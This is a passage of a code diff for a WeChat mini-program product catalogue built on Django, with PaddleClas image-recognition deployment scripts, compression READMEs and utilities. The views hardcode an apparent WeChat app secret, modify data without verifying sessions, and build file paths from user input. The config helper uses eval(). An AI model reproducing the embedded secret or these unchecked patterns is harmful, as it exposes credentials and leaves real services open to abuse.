rec_docs_price.append(rec_price) + rec_docs_price_all.append(rec_docs_price) + + + # print("1") + # print(rec_docs_price_all) + os.remove(log_path) + return JsonResponse({"state": 'true',"container": rec_docs_price_all,"price_all": price_all}) + else: + return JsonResponse({"state": 'false'}) + + + +#登录 + +def login_in(request): + if request.method == "POST": + code = request.POST.get('code') + userinfo = request.POST.get('userinfo') + userinfo = json.loads(userinfo) + s_nickname = userinfo['nickName'] + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_openid = respDict.get("openid") #需要存入的openid + s_session_key = respDict.get("session_key") #需要存入的session_key + + s = str(s_openid) + '_' +str(s_session_key) + sessionID = des_encrypt(s) + sessionID = str(sessionID) + + old_openid = models.TUser.objects.filter(openid=s_openid) #old_openid是查询数据库中是否有s_openid,无为空 + old_openid = old_openid.values() + if not bool(old_openid): #判断表中是否还有对应openid + s_user = models.TUser(openid = s_openid, nickname = s_nickname, session_key = s_session_key) + s_user.save() + update() + else: + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) #替换session_key + + + return JsonResponse({"sessionID": sessionID}) + + + +def record(request): #增加模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + s_container_name = request.POST.get('container_name') #商品名称 str + s_container_price = request.POST.get('container_price') #商品单价 float + + picture = request.FILES['productimage'] #照片 + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + value_name = s_container_name + + + p = Pinyin() + name = p.get_pinyin(value_name).replace('-','') + + s_picture_address = 'gallery/'+ name + '.jpg' + + with open(os.path.join(PICTURE_ROOT,s_picture_address), 'wb') as fh: + for chunk in picture.chunks(): + fh.write(chunk) + fh.close() + + last_data = models.TContainer.objects.last() #查询t_container表中最后一条数据,以便于商品录入排序 + if not bool(last_data.number): + s_number = 1 #序号 + else: + s_number = last_data.number + 1 + + old_container = models.TContainer.objects.filter(container_name=s_container_name) + old_container = old_container.values() + + if not bool(old_container): + + s_container = models.TContainer(number = s_number, container_name = s_container_name, container_price = s_container_price,picture_address = s_picture_address) + s_container.save() + + update() + + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def delete(request): #删除模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + d_number = request.POST.get('number') + d_container_name = request.POST.get('container_name') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + d_number = int(d_number) + old_container = models.TContainer.objects.filter(number = d_number) #查询t_container表中所有数据,判断表中是否已经包含目标商品 + old_container = old_container.values() + + if not bool(old_container): #表内不含待删除商品 + return JsonResponse({"state": 'false', "sessionID": sessionID}) + else: + models.TContainer.objects.filter(number = d_number).delete() + + update() + + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + +def replace(request): #修改模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + number = request.POST.get('number') + r_container_name = request.POST.get('container_name') + r_container_price = request.POST.get('container_price') + r_picture = request.FILES['productimage'] + # print(r_container_name) + + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + models.TContainer.objects.filter(number = number).update(container_name = r_container_name) + models.TContainer.objects.filter(number = number).update(container_price = r_container_price) + + g = models.TContainer.objects.filter(number = number) + + result = models.TContainer.objects.filter(number = number) + + with open(os.path.join(PICTURE_ROOT,result[0].picture_address), 'wb') as fh: + for chunk in r_picture.chunks(): + fh.write(chunk) + fh.close() + + update() + + return JsonResponse({"state": 'true', "sessionID": sessionID}) + else: + return JsonResponse({"state": 'false'}) + + + +def search(request): #查询模块 + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + container_all = information() + + return JsonResponse({"state": 'true', "sessionID": sessionID, 'container_all': container_all}) + else: + return JsonResponse({"state": 'false'}) + + +def find(request): #检索模块 + if request.method== "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + searchtarget = request.POST.get('searchtarget') + + container = models.TContainer.objects.all() + + + find_result = [] + for i in container: + + value = fuzz.partial_ratio("%s"%searchtarget,i.container_name) + + if value>=80: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + find_result.append(temp) + + return JsonResponse({"state": 'true', "sessionID": sessionID,"container_all":find_result}) + else: + return JsonResponse({"state": 'false'}) diff --git a/Smart_container/PaddleClas/deploy/shell/predict.sh b/Smart_container/PaddleClas/deploy/shell/predict.sh new file mode 100644 index 0000000..f0f59f4 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/shell/predict.sh @@ -0,0 +1,18 @@ +# classification +python3.7 python/predict_cls.py -c configs/inference_cls.yaml + +# multilabel_classification +#python3.7 python/predict_cls.py -c configs/inference_multilabel_cls.yaml + +# feature extractor +# python3.7 python/predict_rec.py -c configs/inference_rec.yaml + +# detection +# python3.7 python/predict_det.py -c configs/inference_rec.yaml + + +# build system +#python3.7 python/build_gallery.py -c configs/build_logo.yaml + +# inference system +# python3.7 python/predict_system.py -c configs/inference_logo.yaml diff --git a/Smart_container/PaddleClas/deploy/slim/README.md b/Smart_container/PaddleClas/deploy/slim/README.md new file mode 100644 index 0000000..eed8aa3 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/slim/README.md @@ -0,0 +1,144 @@ + +## Slim功能介绍 +复杂的模型有利于提高模型的性能,但也导致模型中存在一定冗余。此部分提供精简模型的功能,包括两部分:模型量化(量化训练、离线量化)、模型剪枝。 + +其中模型量化将全精度缩减到定点数减少这种冗余,达到减少模型计算复杂度,提高模型推理性能的目的。 +模型量化可以在基本不损失模型的精度的情况下,将FP32精度的模型参数转换为Int8精度,减小模型参数大小并加速计算,使用量化后的模型在移动端等部署时更具备速度优势。 + +模型剪枝将CNN中不重要的卷积核裁剪掉,减少模型参数量,从而降低模型计算复杂度。 + +本教程将介绍如何使用飞桨模型压缩库PaddleSlim做PaddleClas模型的压缩。 +[PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim) 集成了模型剪枝、量化(包括量化训练和离线量化)、蒸馏和神经网络搜索等多种业界常用且领先的模型压缩功能,如果您感兴趣,可以关注并了解。 + +在开始本教程之前,建议先了解[PaddleClas模型的训练方法](../../docs/zh_CN/tutorials/getting_started.md)以及[PaddleSlim](https://paddleslim.readthedocs.io/zh_CN/latest/index.html) + + +## 快速开始 +当训练出一个模型后,如果希望进一步的压缩模型大小并加速预测,可使用量化或者剪枝的方法压缩模型。 + +模型压缩主要包括五个步骤: +1. 安装 PaddleSlim +2. 准备训练好的模型 +3. 模型压缩 +4. 导出量化推理模型 +5. 量化模型预测部署 + +### 1. 安装PaddleSlim + +* 可以通过pip install的方式进行安装。 + +```bash +pip install paddleslim -i https://pypi.tuna.tsinghua.edu.cn/simple +``` + +* 如果获取PaddleSlim的最新特性,可以从源码安装。 + +```bash +git clone https://github.com/PaddlePaddle/PaddleSlim.git +cd Paddleslim +python3.7 setup.py install +``` + +### 2. 准备训练好的模型 + +PaddleClas提供了一系列训练好的[模型](../../docs/zh_CN/models/models_intro.md),如果待量化的模型不在列表中,需要按照[常规训练](../../docs/zh_CN/tutorials/getting_started.md)方法得到训练好的模型。 + +### 3. 模型压缩 + +进入PaddleClas根目录 + +```bash +cd PaddleClas +``` + +`slim`训练相关代码已经集成到`ppcls/engine/`下,离线量化代码位于`deploy/slim/quant_post_static.py`。 + +#### 3.1 模型量化 + +量化训练包括离线量化训练和在线量化训练,在线量化训练效果更好,需加载预训练模型,在定义好量化策略后即可对模型进行量化。 + +##### 3.1.1 在线量化训练 + +训练指令如下: + +* CPU/单卡GPU + +以CPU为例,若使用GPU,则将命令中改成`cpu`改成`gpu` + +```bash +python3.7 tools/train.py -c ppcls/configs/slim/ResNet50_vd_quantization.yaml -o Global.device=cpu +``` + +其中`yaml`文件解析详见[参考文档](../../docs/zh_CN/tutorials/config_description.md)。为了保证精度,`yaml`文件中已经使用`pretrained model`. + + +* 单机多卡/多机多卡启动 + +```bash +export CUDA_VISIBLE_DEVICES=0,1,2,3 +python3.7 -m paddle.distributed.launch \ + --gpus="0,1,2,3" \ + tools/train.py \ + -c ppcls/configs/slim/ResNet50_vd_quantization.yaml +``` + +##### 3.1.2 离线量化 + +**注意**:目前离线量化,必须使用已经训练好的模型,导出的`inference model`进行量化。一般模型导出`inference model`可参考[教程](../../docs/zh_CN/inference.md). + +一般来说,离线量化损失模型精度较多。 + +生成`inference model`后,离线量化运行方式如下 + +```bash +python3.7 deploy/slim/quant_post_static.py -c ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml -o Global.save_inference_dir=./deploy/models/class_ResNet50_vd_ImageNet_infer +``` + +`Global.save_inference_dir`是`inference model`存放的目录。 + +执行成功后,在`Global.save_inference_dir`的目录下,生成`quant_post_static_model`文件夹,其中存储生成的离线量化模型,其可以直接进行预测部署,无需再重新导出模型。 + +#### 3.2 模型剪枝 + +训练指令如下: + +- CPU/单卡GPU + +以CPU为例,若使用GPU,则将命令中改成`cpu`改成`gpu` + +```bash +python3.7 tools/train.py -c ppcls/configs/slim/ResNet50_vd_prune.yaml -o Global.device=cpu +``` + +- 单机单卡/单机多卡/多机多卡启动 + +```bash +export CUDA_VISIBLE_DEVICES=0,1,2,3 +python3.7 -m paddle.distributed.launch \ + --gpus="0,1,2,3" \ + tools/train.py \ + -c ppcls/configs/slim/ResNet50_vd_prune.yaml +``` + +### 4. 导出模型 + +在得到在线量化训练、模型剪枝保存的模型后,可以将其导出为inference model,用于预测部署,以模型剪枝为例: + +```bash +python3.7 tools/export.py \ + -c ppcls/configs/slim/ResNet50_vd_prune.yaml \ + -o Global.pretrained_model=./output/ResNet50_vd/best_model \ + -o Global.save_inference_dir=./inference +``` + + +### 5. 模型部署 + +上述步骤导出的模型可以通过PaddleLite的opt模型转换工具完成模型转换。 +模型部署的可参考 [移动端模型部署](../lite/readme.md) + + +## 训练超参数建议 + +* 量化训练时,建议加载常规训练得到的预训练模型,加速量化训练收敛。 +* 量化训练时,建议初始学习率修改为常规训练的`1/20~1/10`,同时将训练epoch数修改为常规训练的`1/5~1/2`,学习率策略方面,加上Warmup,其他配置信息不建议修改。 diff --git a/Smart_container/PaddleClas/deploy/slim/README_en.md b/Smart_container/PaddleClas/deploy/slim/README_en.md new file mode 100644 index 0000000..d7a978f --- /dev/null +++ b/Smart_container/PaddleClas/deploy/slim/README_en.md @@ -0,0 +1,144 @@ + +## Introduction to Slim + +Generally, a more complex model would achive better performance in the task, but it also leads to some redundancy in the model. This part provides the function of compressing the model, including two parts: model quantization (offline quantization training and online quantization training) and model pruning. +Quantization is a technique that reduces this redundancy by reducing the full precision data to a fixed number, so as to reduce model calculation complexity and improve model inference performance. + +Model pruning cuts off the unimportant convolution kernel in CNN to reduce the amount of model parameters, so as to reduce the computational complexity of the model. + +It is recommended that you could understand following pages before reading this example: +- [The training strategy of PaddleClas models](../../docs/en/tutorials/getting_started_en.md) +- [PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim) + +## Quick Start + After training a model, if you want to further compress the model size and speed up the prediction, you can use quantization or pruning to compress the model according to the following steps. + +1. Install PaddleSlim +2. Prepare trained model +3. Model compression +4. Export inference model +5. Deploy quantization inference model + + +### 1. Install PaddleSlim + +* Install by pip. + +```bash +pip install paddleslim -i https://pypi.tuna.tsinghua.edu.cn/simple +``` + +* Install from source code to get the lastest features. + +```bash +git clone https://github.com/PaddlePaddle/PaddleSlim.git +cd Paddleslim +python setup.py install +``` + + +### 2. Download Pretrain Model +PaddleClas provides a series of trained [models](../../docs/en/models/models_intro_en.md). +If the model to be quantified is not in the list, you need to follow the [Regular Training](../../docs/en/tutorials/getting_started_en.md) method to get the trained model. + +### 3. Model Compression + +Go to the root directory of PaddleClas + +```bash +cd PaddleClase +``` + +The training related codes have been integrated into `ppcls/engine/`. The offline quantization code is located in `deploy/slim/quant_post_static.py` + +#### 3.1 Model Quantization + +Quantization training includes offline quantization and online quantization training. + +##### 3.1.1 Online quantization training + +Online quantization training is more effective. It is necessary to load the pre-trained model. +After the quantization strategy is defined, the model can be quantified. + +The training command is as follow: + +* CPU/Single GPU + +If using GPU, change the `cpu` to `gpu` in the following command. + +```bash +python3.7 tools/train.py -c ppcls/configs/slim/ResNet50_vd_quantization.yaml -o Global.device=cpu +``` + +The description of `yaml` file can be found in this [doc](../../docs/en/tutorials/config_en.md). To get better accuracy, the `pretrained model`is used in `yaml`. + + +* Distributed training + +```bash +export CUDA_VISIBLE_DEVICES=0,1,2,3 +python3.7 -m paddle.distributed.launch \ + --gpus="0,1,2,3" \ + tools/train.py \ + -m train \ + -c ppcls/configs/slim/ResNet50_vd_quantization.yaml +``` + +##### 3.1.2 Offline quantization + +**Attention**: At present, offline quantization must use `inference model` as input, which can be exported by trained model. The process of exporting `inference model` for trained model can refer to this [doc](../../docs/en/inference.md). + +Generally speaking, the offline quantization gets more loss of accuracy than online qutization training. + +After getting `inference model`, we can run following command to get offline quantization model. + +``` +python3.7 deploy/slim/quant_post_static.py -c ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml -o Global.save_inference_dir=./deploy/models/class_ResNet50_vd_ImageNet_infer +``` + +`Global.save_inference_dir` is the directory storing the `inference model`. + +If run successfully, the directory `quant_post_static_model` is generated in `Global.save_inference_dir`, which stores the offline quantization model that can be used for deploy directly. + +#### 3.2 Model Pruning + +- CPU/Single GPU + +If using GPU, change the `cpu` to `gpu` in the following command. + +```bash +python3.7 tools/train.py -c ppcls/configs/slim/ResNet50_vd_prune.yaml -o Global.device=cpu +``` + +- Distributed training + +```bash +export CUDA_VISIBLE_DEVICES=0,1,2,3 +python3.7 -m paddle.distributed.launch \ + --gpus="0,1,2,3" \ + tools/train.py \ + -c ppcls/configs/slim/ResNet50_vd_prune.yaml +``` + + + +### 4. Export inference model + +After getting the compressed model, we can export it as inference model for predictive deployment. Using pruned model as example: + +```bash +python3.7 tools/export.py \ + -c ppcls/configs/slim/ResNet50_vd_prune.yaml \ + -o Global.pretrained_model=./output/ResNet50_vd/best_model + -o Global.save_inference_dir=./inference +``` + +### 5. Deploy +The derived model can be converted through the `opt tool` of PaddleLite. + +For compresed model deployment, please refer to [Mobile terminal model deployment](../lite/readme_en.md) + +## Notes: + +* In quantitative training, it is suggested to load the pre-trained model obtained from conventional training to accelerate the convergence of quantitative training. +* In quantitative training, it is suggested that the initial learning rate should be changed to `1 / 20 ~ 1 / 10` of the conventional training, and the training epoch number should be changed to `1 / 5 ~ 1 / 2` of the conventional training. In terms of learning rate strategy, it's better to train with warmup, other configuration information is not recommended to be changed. diff --git a/Smart_container/PaddleClas/deploy/slim/quant_post_static.py b/Smart_container/PaddleClas/deploy/slim/quant_post_static.py new file mode 100644 index 0000000..edab53d --- /dev/null +++ b/Smart_container/PaddleClas/deploy/slim/quant_post_static.py @@ -0,0 +1,74 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +import os +import sys + +import numpy as np +import paddle +import paddleslim +from paddle.jit import to_static +from paddleslim.analysis import dygraph_flops as flops + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../../'))) +from paddleslim.dygraph.quant import QAT + +from ppcls.data import build_dataloader +from ppcls.utils import config as conf +from ppcls.utils.logger import init_logger + + +def main(): + args = conf.parse_args() + config = conf.get_config(args.config, overrides=args.override, show=False) + + assert os.path.exists( + os.path.join(config["Global"]["save_inference_dir"], + 'inference.pdmodel')) and os.path.exists( + os.path.join(config["Global"]["save_inference_dir"], + 'inference.pdiparams')) + config["DataLoader"]["Train"]["sampler"]["batch_size"] = 1 + config["DataLoader"]["Train"]["loader"]["num_workers"] = 0 + init_logger() + device = paddle.set_device("cpu") + train_dataloader = build_dataloader(config["DataLoader"], "Train", device, + False) + + def sample_generator(loader): + def __reader__(): + for indx, data in enumerate(loader): + images = np.array(data[0]) + yield images + + return __reader__ + + paddle.enable_static() + place = paddle.CPUPlace() + exe = paddle.static.Executor(place) + paddleslim.quant.quant_post_static( + executor=exe, + model_dir=config["Global"]["save_inference_dir"], + model_filename='inference.pdmodel', + params_filename='inference.pdiparams', + quantize_model_path=os.path.join( + config["Global"]["save_inference_dir"], "quant_post_static_model"), + sample_generator=sample_generator(train_dataloader), + batch_nums=10) + + +if __name__ == "__main__": + main() diff --git a/Smart_container/PaddleClas/deploy/utils/__init__.py b/Smart_container/PaddleClas/deploy/utils/__init__.py new file mode 100644 index 0000000..baf14a9 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/__init__.py @@ -0,0 +1,5 @@ +from . import logger +from . import config +from . import get_image_list +from . import predictor +from . import encode_decode \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/utils/config.py b/Smart_container/PaddleClas/deploy/utils/config.py new file mode 100644 index 0000000..eb79148 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/config.py @@ -0,0 +1,197 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import copy +import argparse +import yaml + +from utils import logger + +__all__ = ['get_config'] + + +class AttrDict(dict): + def __getattr__(self, key): + return self[key] + + def __setattr__(self, key, value): + if key in self.__dict__: + self.__dict__[key] = value + else: + self[key] = value + + def __deepcopy__(self, content): + return copy.deepcopy(dict(self)) + + +def create_attr_dict(yaml_config): + from ast import literal_eval + for key, value in yaml_config.items(): + if type(value) is dict: + yaml_config[key] = value = AttrDict(value) + if isinstance(value, str): + try: + value = literal_eval(value) + except BaseException: + pass + if isinstance(value, AttrDict): + create_attr_dict(yaml_config[key]) + else: + yaml_config[key] = value + + +def parse_config(cfg_file): + """Load a config file into AttrDict""" + with open(cfg_file, 'r') as fopen: + yaml_config = AttrDict(yaml.load(fopen, Loader=yaml.SafeLoader)) + create_attr_dict(yaml_config) + return yaml_config + + +def print_dict(d, delimiter=0): + """ + Recursively visualize a dict and + indenting acrrording by the relationship of keys. + """ + placeholder = "-" * 60 + for k, v in sorted(d.items()): + if isinstance(v, dict): + logger.info("{}{} : ".format(delimiter * " ", + logger.coloring(k, "HEADER"))) + print_dict(v, delimiter + 4) + elif isinstance(v, list) and len(v) >= 1 and isinstance(v[0], dict): + logger.info("{}{} : ".format(delimiter * " ", + logger.coloring(str(k), "HEADER"))) + for value in v: + print_dict(value, delimiter + 4) + else: + logger.info("{}{} : {}".format(delimiter * " ", + logger.coloring(k, "HEADER"), + logger.coloring(v, "OKGREEN"))) + if k.isupper(): + logger.info(placeholder) + + +def print_config(config): + """ + visualize configs + Arguments: + config: configs + """ + logger.advertise() + print_dict(config) + + +def override(dl, ks, v): + """ + Recursively replace dict of list + Args: + dl(dict or list): dict or list to be replaced + ks(list): list of keys + v(str): value to be replaced + """ + + def str2num(v): + try: + return eval(v) + except Exception: + return v + + assert isinstance(dl, (list, dict)), ("{} should be a list or a dict") + assert len(ks) > 0, ('lenght of keys should larger than 0') + if isinstance(dl, list): + k = str2num(ks[0]) + if len(ks) == 1: + assert k < len(dl), ('index({}) out of range({})'.format(k, dl)) + dl[k] = str2num(v) + else: + override(dl[k], ks[1:], v) + else: + if len(ks) == 1: + # assert ks[0] in dl, ('{} is not exist in {}'.format(ks[0], dl)) + if not ks[0] in dl: + logger.warning('A new filed ({}) detected!'.format(ks[0], dl)) + dl[ks[0]] = str2num(v) + else: + override(dl[ks[0]], ks[1:], v) + + +def override_config(config, options=None): + """ + Recursively override the config + Args: + config(dict): dict to be replaced + options(list): list of pairs(key0.key1.idx.key2=value) + such as: [ + 'topk=2', + 'VALID.transforms.1.ResizeImage.resize_short=300' + ] + Returns: + config(dict): replaced config + """ + if options is not None: + for opt in options: + assert isinstance(opt, str), ( + "option({}) should be a str".format(opt)) + assert "=" in opt, ( + "option({}) should contain a =" + "to distinguish between key and value".format(opt)) + pair = opt.split('=') + assert len(pair) == 2, ("there can be only a = in the option") + key, value = pair + keys = key.split('.') + override(config, keys, value) + return config + + +def get_config(fname, overrides=None, show=True): + """ + Read config from file + """ + assert os.path.exists(fname), ( + 'config file({}) is not exist'.format(fname)) + config = parse_config(fname) + override_config(config, overrides) + if show: + print_config(config) + # check_config(config) + return config + + +def parser(): + parser = argparse.ArgumentParser("generic-image-rec train script") + parser.add_argument( + '-c', + '--config', + type=str, + default='configs/config.yaml', + help='config file path') + parser.add_argument( + '-o', + '--override', + action='append', + default=[], + help='config options to be overridden') + parser.add_argument( + '-v', + '--verbose', + action='store_true', + help='wheather print the config info') + return parser + + +def parse_args(): + args = parser().parse_args() + return args diff --git a/Smart_container/PaddleClas/deploy/utils/draw_bbox.py b/Smart_container/PaddleClas/deploy/utils/draw_bbox.py new file mode 100644 index 0000000..3b61ad4 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/draw_bbox.py @@ -0,0 +1,62 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os + +import cv2 +import numpy as np +from PIL import Image, ImageDraw, ImageFont + + +def draw_bbox_results(image, + results, + input_path, + font_path="/root/Smart_container/PaddleClas/deploy/utils/simfang.ttf", + save_dir=None): + if isinstance(image, np.ndarray): + image = Image.fromarray(image) + draw = ImageDraw.Draw(image) + font_size = 48 + font = ImageFont.truetype(font_path, font_size, encoding="utf-8") + + color = (0, 102, 255) + + for result in results: + # empty results + if result["rec_docs"] is None: + continue + + xmin, ymin, xmax, ymax = result["bbox"] + text = "{}, {:.2f}".format(result["rec_docs"], result["rec_scores"]) + th = font_size + tw = font.getsize(text)[0] + # tw = int(len(result["rec_docs"]) * font_size) + 60 + start_y = max(0, ymin - th) + + draw.rectangle( + [(xmin + 1, start_y), (xmin + tw + 1, start_y + th)], fill=color) + + draw.text((xmin + 4, start_y), text, fill=(255, 255, 255), font=font) + + draw.rectangle( + [(xmin, ymin), (xmax, ymax)], outline=(255, 0, 0), width=6) + + image_name = os.path.basename(input_path) + if save_dir is None: + save_dir = "output" + os.makedirs(save_dir, exist_ok=True) + output_path = os.path.join(save_dir, image_name) + + image.save(output_path, quality=95) + return np.array(image) diff --git a/Smart_container/PaddleClas/deploy/utils/encode_decode.py b/Smart_container/PaddleClas/deploy/utils/encode_decode.py new file mode 100644 index 0000000..d76a529 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/encode_decode.py @@ -0,0 +1,31 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import base64 + +import numpy as np + + +def np_to_b64(images): + img_str = base64.b64encode(images).decode('utf8') + return img_str, images.shape + + +def b64_to_np(b64str, revert_params): + shape = revert_params["shape"] + dtype = revert_params["dtype"] + dtype = getattr(np, dtype) if isinstance(str, type(dtype)) else dtype + data = base64.b64decode(b64str.encode('utf8')) + data = np.fromstring(data, dtype).reshape(shape) + return data \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/utils/get_image_list.py b/Smart_container/PaddleClas/deploy/utils/get_image_list.py new file mode 100644 index 0000000..6f10935 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/get_image_list.py @@ -0,0 +1,49 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import argparse +import base64 +import numpy as np + + +def get_image_list(img_file): + imgs_lists = [] + if img_file is None or not os.path.exists(img_file): + raise Exception("not found any img file in {}".format(img_file)) + + img_end = ['jpg', 'png', 'jpeg', 'JPEG', 'JPG', 'bmp'] + if os.path.isfile(img_file) and img_file.split('.')[-1] in img_end: + imgs_lists.append(img_file) + elif os.path.isdir(img_file): + for single_file in os.listdir(img_file): + if single_file.split('.')[-1] in img_end: + imgs_lists.append(os.path.join(img_file, single_file)) + if len(imgs_lists) == 0: + raise Exception("not found any img file in {}".format(img_file)) + imgs_lists = sorted(imgs_lists) + return imgs_lists + + +def get_image_list_from_label_file(image_path, label_file_path): + imgs_lists = [] + gt_labels = [] + with open(label_file_path, "r") as fin: + lines = fin.readlines() + for line in lines: + image_name, label = line.strip("\n").split() + label = int(label) + imgs_lists.append(os.path.join(image_path, image_name)) + gt_labels.append(int(label)) + return imgs_lists, gt_labels diff --git a/Smart_container/PaddleClas/deploy/utils/imagenet1k_label_list.txt b/Smart_container/PaddleClas/deploy/utils/imagenet1k_label_list.txt new file mode 100644 index 0000000..376e180 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/utils/imagenet1k_label_list.txt @@ -0,0 +1,1000 @@ +0 tench, Tinca tinca +1 goldfish, Carassius auratus +2 great white shark, white shark, man-eater, man-eating shark, Carcharodon carcharias +3 tiger shark, Galeocerdo cuvieri +4 hammerhead, hammerhead shark +5 electric ray, crampfish, numbfish, torpedo +6 stingray +7 cock +8 hen +9 ostrich, Struthio camelus +10 brambling, Fringilla montifringilla +11 goldfinch, Carduelis carduelis +12 house finch, linnet, Carpodacus mexicanus +13 junco, snowbird +14 indigo bunting, indigo finch, indigo bird, Passerina cyanea +15 robin, American robin, Turdus migratorius +16 bulbul +17 jay +18 magpie +19 chickadee +20 water ouzel, dipper +21 kite +22 bald eagle, American eagle, Haliaeetus leucocephalus +23 vulture +24 great grey owl, great gray owl, Strix nebulosa +25 European fire salamander, Salamandra salamandra +26 common newt, Triturus vulgaris +27 eft +28 spotted salamander, Ambystoma maculatum +29 axolotl, mud puppy, Ambystoma mexicanum +30 bullfrog, Rana catesbeiana +31 tree frog, tree-frog +32 tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui +33 loggerhead, loggerhead turtle, Caretta caretta +34 leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea +35 mud turtle +36 terrapin +37 box turtle, box tortoise +38 banded gecko +39 common iguana, iguana, Iguana iguana +40 American chameleon, anole, Anolis carolinensis +41 whiptail, whiptail lizard +42 agama +43 frilled lizard, Chlamydosaurus kingi +44 alligator lizard +45 Gila monster, Heloderma suspectum +46 green lizard, Lacerta viridis +47 African chameleon, Chamaeleo chamaeleon +48 Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis +49 African crocodile, Nile crocodile, Crocodylus niloticus +50 American alligator, Alligator mississipiensis +51 triceratops +52 thunder snake, worm snake, Carphophis amoenus +53 ringneck snake, ring-necked snake, ring snake +54 hognose snake, puff adder, sand viper +55 green snake, grass snake +56 king snake, kingsnake +57 garter snake, grass snake +58 water snake +59 vine snake +60 night snake, Hypsiglena torquata +61 boa constrictor, Constrictor constrictor +62 rock python, rock snake, Python sebae +63 Indian cobra, Naja naja +64 green mamba +65 sea snake +66 horned viper, cerastes, sand viper, horned asp, Cerastes cornutus +67 diamondback, diamondback rattlesnake, Crotalus adamanteus +68 sidewinder, horned rattlesnake, Crotalus cerastes +69 trilobite +70 harvestman, daddy longlegs, Phalangium opilio +71 scorpion +72 black and gold garden spider, Argiope aurantia +73 barn spider, Araneus cavaticus +74 garden spider, Aranea diademata +75 black widow, Latrodectus mactans +76 tarantula +77 wolf spider, hunting spider +78 tick +79 centipede +80 black grouse +81 ptarmigan +82 ruffed grouse, partridge, Bonasa umbellus +83 prairie chicken, prairie grouse, prairie fowl +84 peacock +85 quail +86 partridge +87 African grey, African gray, Psittacus erithacus +88 macaw +89 sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita +90 lorikeet +91 coucal +92 bee eater +93 